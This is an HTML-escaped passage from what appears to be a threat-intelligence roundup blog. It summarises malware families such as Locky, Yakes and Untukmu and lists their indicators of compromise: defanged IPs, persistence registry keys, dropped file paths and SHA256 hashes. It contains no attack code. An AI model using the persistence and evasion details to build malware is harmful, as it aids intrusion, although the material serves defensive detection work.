/&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Yakes-6330794-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Yakes is a trojan which installs itself on a machine via a .vbs script in the Startup folder, and then allows its packager to connect to the infected machine. IPs and domain names of the CnC server as well as mutex names vary depending on the packager.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.Locky-6330799-0&lt;/b&gt;&lt;br /&gt;Ransomware&lt;br /&gt;Throughout the majority of 2016, Locky was the dominant ransomware in the threat landscape. It was an early pioneer when it came to using scripting formats Windows hosts would natively handle, like .js, .wsf, and .hta. These scripting formats acted as a vehicle to deliver the payload via email campaigns. Recent in-depth look: &lt;a href="http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html"&gt;http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html&lt;/a&gt;&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.DownloaderJava-6330457-0&lt;/b&gt;&lt;br /&gt;Downloader&lt;br /&gt;This sample is a .NET downloader. It downloads additional Java files from an hardcoded URL and they are executed. This binary is actively sent as attachment in an ongoing spam campaign.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;h2&gt;Threats&lt;/h2&gt;&lt;h3&gt;Doc.Macro.StrObfuscation-6329879-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;185[.]165[.]29[.]36&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%TEMP%\&amp;lt;random_string&amp;gt;.txt&lt;/li&gt;&lt;li&gt;%TEMP%\&amp;lt;random_string&amp;gt;.txt&lt;/li&gt;&lt;li&gt;%TEMP%\&amp;lt;random_string&amp;gt;.js&lt;/li&gt;&lt;li&gt;%TEMP%\&amp;lt;random_string&amp;gt;.txt&lt;/li&gt;&lt;li&gt;%TEMP%\&amp;lt;random_string&amp;gt;.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;b64e77a8b76986e6929e48507b5f8fed9c0eb339f058fa5a31d38920e25c3a8c&lt;/li&gt;&lt;li&gt;9bcbbba6636b99da1ab567813af8226fb22ab47509326c6501d22e40efa1464c&lt;/li&gt;&lt;li&gt;79a89d266bcf1b8c829b823203fce8e69159246469c14ac355f615c2dd783e01&lt;/li&gt;&lt;li&gt;b96f975a2c7cfb03e53e35f365e3f16e51c2370b15970693c7dd2201f08ddb1c&lt;/li&gt;&lt;li&gt;3e4c9f8828897c19e264a2a066d9c181edf08885b6fafdec833aa683259aced9&lt;/li&gt;&lt;li&gt;79a89d266bcf1b8c829b823203fce8e69159246469c14ac355f615c2dd783e01&lt;/li&gt;&lt;li&gt;48487be062791d86b66d10cbdd54ce1b1dfbfe99a86bfd8c3b2ba6be7df28f6e&lt;/li&gt;&lt;li&gt;3e4c9f8828897c19e264a2a066d9c181edf08885b6fafdec833aa683259aced9&lt;/li&gt;&lt;li&gt;b64e77a8b76986e6929e48507b5f8fed9c0eb339f058fa5a31d38920e25c3a8c&lt;/li&gt;&lt;li&gt;e0e134db8de265d9ecd2f174cd143da54a4a922d64abfff704488ded3c7b3bdf&lt;/li&gt;&lt;li&gt;9bcbbba6636b99da1ab567813af8226fb22ab47509326c6501d22e40efa1464c&lt;/li&gt;&lt;li&gt;02840c7ca57b46ba7d6b40f93e0054dd180a290b30c2a8397fcd646ef30cfdf6&lt;/li&gt;&lt;li&gt;6f39761c2c1fcd6975505a47828f9dec483c8ec730ba68eb05e09ef60a91c879&lt;/li&gt;&lt;li&gt;b96f975a2c7cfb03e53e35f365e3f16e51c2370b15970693c7dd2201f08ddb1c&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-1Aqlb5LXdis/WU1vE2MqaoI/AAAAAAAABG4/9niZ6mlN1AYdNAAYFqJkH_sfooWCOBrIwCLcBGAs/s1600/Doc_Macro_StrObfuscation_6329879_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-1Aqlb5LXdis/WU1vE2MqaoI/AAAAAAAABG4/9niZ6mlN1AYdNAAYFqJkH_sfooWCOBrIwCLcBGAs/s400/Doc_Macro_StrObfuscation_6329879_0_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-hDKL82TkWOI/WU1vKSBnzyI/AAAAAAAABG8/_x8jdPCIi84g_6Fi45gN5moCnd4XWqBlQCLcBGAs/s1600/Doc_Macro_StrObfuscation_6329879_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="807" data-original-width="1237" height="260" src="https://4.bp.blogspot.com/-hDKL82TkWOI/WU1vKSBnzyI/AAAAAAAABG8/_x8jdPCIi84g_6Fi45gN5moCnd4XWqBlQCLcBGAs/s400/Doc_Macro_StrObfuscation_6329879_0_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-LIcOjCsGqqY/WU1vPTdSbzI/AAAAAAAABHA/rjfFPYoA8ss4pkYRL4y6R3HXflHCSfmuwCLcBGAs/s1600/Doc_Macro_StrObfuscation_6329879_0_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="600" data-original-width="1092" height="218" src="https://4.bp.blogspot.com/-LIcOjCsGqqY/WU1vPTdSbzI/AAAAAAAABHA/rjfFPYoA8ss4pkYRL4y6R3HXflHCSfmuwCLcBGAs/s400/Doc_Macro_StrObfuscation_6329879_0_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-Rt7tcTBRl7A/WU1vTVvWAtI/AAAAAAAABHE/6OGezlkaS2g39xoDcahO8KcsE7CdK4d4ACLcBGAs/s1600/Doc_Macro_StrObfuscation_6329879_0_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://2.bp.blogspot.com/-Rt7tcTBRl7A/WU1vTVvWAtI/AAAAAAAABHE/6OGezlkaS2g39xoDcahO8KcsE7CdK4d4ACLcBGAs/s400/Doc_Macro_StrObfuscation_6329879_0_malware.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Dropper.skypee-6329923-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;skypee&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;1505527138&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8&lt;/li&gt;&lt;li&gt;09aa51458f73755e4e58a7d59853f07d685d7e7dc48971117b1e9392a1aa416f&lt;/li&gt;&lt;li&gt;99e7ecbe795d7d6a03c4965b2ac7d79544a6772a97ccaca909f66bfe174fa023&lt;/li&gt;&lt;li&gt;26ef58faf48e58dc0680c6b595436dbba01ea3c8fca809858fcfc47d66b56914&lt;/li&gt;&lt;li&gt;0d983d4ee06e08b4e1df021c17792a8352c8ff4b2d3e6ee4f7fe53ce30122d66&lt;/li&gt;&lt;li&gt;0b5800e19bdb4c43ab1469ce88af3d807eaa7620697a4b88368ab6beef098240&lt;/li&gt;&lt;li&gt;3a5c13ed645ab7571c2a6ba27fd689e748e7d42de35bc076d18ad76070a13d14&lt;/li&gt;&lt;li&gt;a6f34f3a70ea64adccfbd983abfebe9dc46741064da0520582b09ce6d6a966ee&lt;/li&gt;&lt;li&gt;5ac152e574c091986561d8055d0b0a97fab1267c6dfba69d169ac9c41a5bc390&lt;/li&gt;&lt;li&gt;f33a3141ee599c94ff60b40be0c0d18c66732640a809b4319a0140eb7827bafb&lt;/li&gt;&lt;li&gt;7f7fe90b586671e59c6769e4202871fb10573983de7fbe7ca7ad3a97af7395af&lt;/li&gt;&lt;li&gt;dd8826ffbe107318163ed2716231ccf588453308bbcd3c798720e7586c059f99&lt;/li&gt;&lt;li&gt;2b3d33238a64134c347db9a3f5b9f0fbecfe62199f081c3c44fb5f1b0948e7cc&lt;/li&gt;&lt;li&gt;e336b8976fb83889c3027ed084a02f9de97f90787304bfa87c58be8dd8035e20&lt;/li&gt;&lt;li&gt;7f990624c65a28f0803e19c5a37d34567a921d17531899a384f2077c1c6f5dff&lt;/li&gt;&lt;li&gt;c62ef9ef0c92b95740f8a67c9879d3c2f951655cccc20c310140668265d8135f&lt;/li&gt;&lt;li&gt;bb5f19265e7b5094cdf55c401bae987cf895bf885cf485c3c627c1fe267e9bfd&lt;/li&gt;&lt;li&gt;f5d55f9539e753fe3a4e0de50bb3c6347ee9928c0f6db33e5f6b6e4af179da0f&lt;/li&gt;&lt;li&gt;2948da52a96f06cfc4bfb7d4d079201aaa3ef89de1cc144462973107c4962435&lt;/li&gt;&lt;li&gt;77ca8909ec71c9086e569cb2acbf4c766dd60f758a5ccc938402d3f176636ae3&lt;/li&gt;&lt;li&gt;c80fbdbba34721670043965c3b02832df7f8cb1c5b5c57b04dbb5ee6346d5994&lt;/li&gt;&lt;li&gt;8c2579168922d065854582cc486a0bb43f8accb60ccc01ad1035894012ac2e83&lt;/li&gt;&lt;li&gt;de8f2233c54d10ae9b51325cefb5dfad644acc225d4ddacb5c77ed89b6b1a645&lt;/li&gt;&lt;li&gt;f5f11cc63feec411864cdc27f1d0d186b5173cf443876450e445d47d29b8ada6&lt;/li&gt;&lt;li&gt;1ca9f0b54357839435e64dd26d74fb365622b54395f56bf25985db0e7470a355&lt;/li&gt;&lt;li&gt;68ed0c9628c7764c5b3826309fe5db06a5380e7f1c8ebfb8f62c68d12d135b49&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-mF4MCAyrarQ/WU1ven90yFI/AAAAAAAABHI/0HIrnFDWpYk39qaTXBKO4E5m6rjSpnZMACLcBGAs/s1600/35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-mF4MCAyrarQ/WU1ven90yFI/AAAAAAAABHI/0HIrnFDWpYk39qaTXBKO4E5m6rjSpnZMACLcBGAs/s400/35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-bmxrWr8Uyes/WU1vi7NF3NI/AAAAAAAABHM/hr2-BJC-6IUPmbJDklb-FZzTSTGut9GGgCLcBGAs/s1600/35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1395" data-original-width="1237" height="400" src="https://2.bp.blogspot.com/-bmxrWr8Uyes/WU1vi7NF3NI/AAAAAAAABHM/hr2-BJC-6IUPmbJDklb-FZzTSTGut9GGgCLcBGAs/s400/35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8_threatgrid.png" width="353" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-FtIsGqEOezk/WU1vmkvrHsI/AAAAAAAABHQ/5M5-Qfj-nmocjOvTyWx3nBnGRaVyLsD_ACLcBGAs/s1600/sonic4us.ru_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="558" data-original-width="1112" height="200" src="https://3.bp.blogspot.com/-FtIsGqEOezk/WU1vmkvrHsI/AAAAAAAABHQ/5M5-Qfj-nmocjOvTyWx3nBnGRaVyLsD_ACLcBGAs/s400/sonic4us.ru_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Worm.Untukmu-5949608-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\OFFICE\12.0\OUTLOOK\RESILIENCY\STARTUPITEMS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;w+%&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\OFFICE\12.0\OUTLOOK\RESILIENCY\STARTUPITEMS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;l:(&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;LogonAdministrator&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\INSTALLER&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableMSI&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableSR&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\CONTROL PANEL\DESKTOP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;SCRNSAVE.EXE&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;NoFolderOptions&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CABINETSTATE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;FullPathAddress&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableRegistryTools&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\CONTROL PANEL\DESKTOP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ScreenSaveTimeOut&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableCMD&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;xk&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableConfig&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\AEDEBUG&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Debugger&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Shell&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;internat.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MENUORDER\START MENU&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Order&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\Office\12.0\Outlook\Resiliency\StartupItems&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\CLASSES\lnkfile\shell\open\command&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\CLASSES\LNKFILE\SHELL\open&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\Windows\CurrentVersion\Policies\System\&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\CSRSS.EXE&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\winlogon.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\smss.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\SERVICES.EXE&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\SMSS.EXE&lt;/li&gt;&lt;li&gt;%System32%\shell.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\All Users\Start Menu\Programs\Startup\Empty.pif&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\lsass.exe&lt;/li&gt;&lt;li&gt;\XK\Folder.htt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\csrss.exe&lt;/li&gt;&lt;li&gt;%WinDir%\xk.exe&lt;/li&gt;&lt;li&gt;\Data Administrator.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\services.exe&lt;/li&gt;&lt;li&gt;%System32%\IExplorer.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\LSASS.EXE&lt;/li&gt;&lt;li&gt;%System32%\Mig2.scr&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\WINLOGON.EXE&lt;/li&gt;&lt;li&gt;\xk.exe&lt;/li&gt;&lt;li&gt;\XK\New Folder.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;26fbb2aa5a28de5e149e0178dacb964333c852bbca2a1416d860e5edc84cbe04&lt;/li&gt;&lt;li&gt;b5e7b1b06efe80a081a2cbdff0fab4539be0797b2351ab4e1b247303586d1340&lt;/li&gt;&lt;li&gt;36890fa6756c252bc89abb88ec9da140cd87937eb5223af05e4e8ef36ec019c9&lt;/li&gt;&lt;li&gt;34c9c0d2fbb403f7e8068ce49071da6dbeadc4ad995101388c9ad092e38f90de&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-CKFWoxxdL2Q/WU1vvZC_SPI/AAAAAAAABHU/oGf5-EhRF2QvHYkoxGOujTA5slXfvuLUgCLcBGAs/s1600/Win_Worm_Untukmu_5949608_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://3.bp.blogspot.com/-CKFWoxxdL2Q/WU1vvZC_SPI/AAAAAAAABHU/oGf5-EhRF2QvHYkoxGOujTA5slXfvuLUgCLcBGAs/s320/Win_Worm_Untukmu_5949608_0_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-IaU9KzQr6Ks/WU1vzr8LQQI/AAAAAAAABHY/aT98Ml9u6jgQoIu49-sTSl1FLg-N9V07ACLcBGAs/s1600/Win_Worm_Untukmu_5949608_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1311" data-original-width="1237" height="400" src="https://3.bp.blogspot.com/-IaU9KzQr6Ks/WU1vzr8LQQI/AAAAAAAABHY/aT98Ml9u6jgQoIu49-sTSl1FLg-N9V07ACLcBGAs/s400/Win_Worm_Untukmu_5949608_0_threatgrid.png" width="376" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Shifu-6330434-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: 